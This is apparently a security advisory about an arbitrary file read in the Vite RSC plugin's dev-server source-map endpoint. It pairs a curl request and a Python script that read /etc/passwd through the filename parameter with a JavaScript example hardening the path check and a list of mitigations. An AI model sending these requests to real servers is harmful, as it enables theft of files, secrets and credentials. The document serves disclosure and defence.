The vulnerability exists in the `/__vite_rsc_findSourceMapURL` endpoint of the Vite RSC plugin. During development mode (`vite dev`), this endpoint accepts a user-controlled `filename` query parameter. If the provided filename string begins with `file://`, it is converted to a filesystem path using `fileURLToPath()`. The code then checks if the file exists with `fs.existsSync()` and, without any path traversal or directory validation, reads its entire contents synchronously via `fs.readFileSync(filename, 'utf-8')`. The file’s content is embedded into a JSON response object within the `sourcesContent` array, which is then returned to the unauthenticated attacker. This allows reading any file accessible to the Node.js process.
Platform: @vitejs/plugin-rsc
Version: latest/unpatched
Vulnerability: Arbitrary file read
Severity: High
date:
Prediction: Patch expected soon
What Undercode Say:
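```bash
curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'
```

```python
import json
import urllib.parse
import urllib.request

# Same host, port and file as the curl request above
host, port, file_path = "localhost", 5173, "/etc/passwd"

url = f"http://{host}:{port}/__vite_rsc_findSourceMapURL"
params = {"filename": f"file://{file_path}", "environmentName": "Server"}
# The dict must be URL-encoded into a query string before it is appended
response = urllib.request.urlopen(f"{url}?{urllib.parse.urlencode(params)}")
data = json.loads(response.read())
print(data["sourcesContent"][0])
```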
How to Exploit:
Network-exposed dev servers
XSS chained attacks
Malicious local packages
Protection from this CVE:
Restrict dev server exposure
Validate file paths
Disable plugin development
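To illustrate "Validate file paths", the sketch below models the unchecked read flow described above next to a version confined to the project root. It is an added example, not the plugin's code or its patch; the function names `readUnchecked`, `readConfined` and `demo`, and the temporary fixture files, are assumptions made for the demonstration.

```javascript
// Added example; readUnchecked, readConfined and demo are hypothetical names.
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');
const { fileURLToPath, pathToFileURL } = require('node:url');

// Models the flow described above: file:// URL -> path -> existsSync -> readFileSync.
function readUnchecked(filename) {
  if (filename.startsWith('file://')) filename = fileURLToPath(filename);
  return fs.existsSync(filename) ? fs.readFileSync(filename, 'utf-8') : null;
}

// Hardened: canonicalise the path, then require it to sit inside `root`.
function readConfined(filename, root) {
  let candidate;
  try {
    candidate = filename.startsWith('file://') ? fileURLToPath(filename) : filename;
    // realpathSync collapses ".." and symlinks, and throws if the file is missing.
    candidate = fs.realpathSync(path.resolve(root, candidate));
  } catch {
    return null; // malformed file:// URL or nonexistent path
  }
  const rel = path.relative(fs.realpathSync(root), candidate);
  const escapes = rel === '' || rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
  if (escapes || !fs.statSync(candidate).isFile()) return null;
  return fs.readFileSync(candidate, 'utf-8');
}

// Constructed fixture: a project root plus a secrets file one level above it.
function demo() {
  const base = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'rsc-demo-')));
  const root = path.join(base, 'project');
  fs.mkdirSync(path.join(root, 'src'), { recursive: true });
  fs.writeFileSync(path.join(root, 'src', 'app.js'), 'export default 1\n');
  fs.writeFileSync(path.join(base, '.env'), 'API_KEY=constructed\n');
  const outside = pathToFileURL(path.join(base, '.env')).href;
  const inside = pathToFileURL(path.join(root, 'src', 'app.js')).href;
  const result = {
    uncheckedOutside: readUnchecked(outside),
    confinedOutside: readConfined(outside, root),
    confinedTraversal: readConfined('src/../../.env', root),
    confinedInside: readConfined(inside, root),
  };
  fs.rmSync(base, { recursive: true, force: true });
  return result;
}

console.log(demo());
```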
Impact:
Leaks environment variables
Exposes secrets/credentials
Compromises source code
Sources:
Reported By: github.com

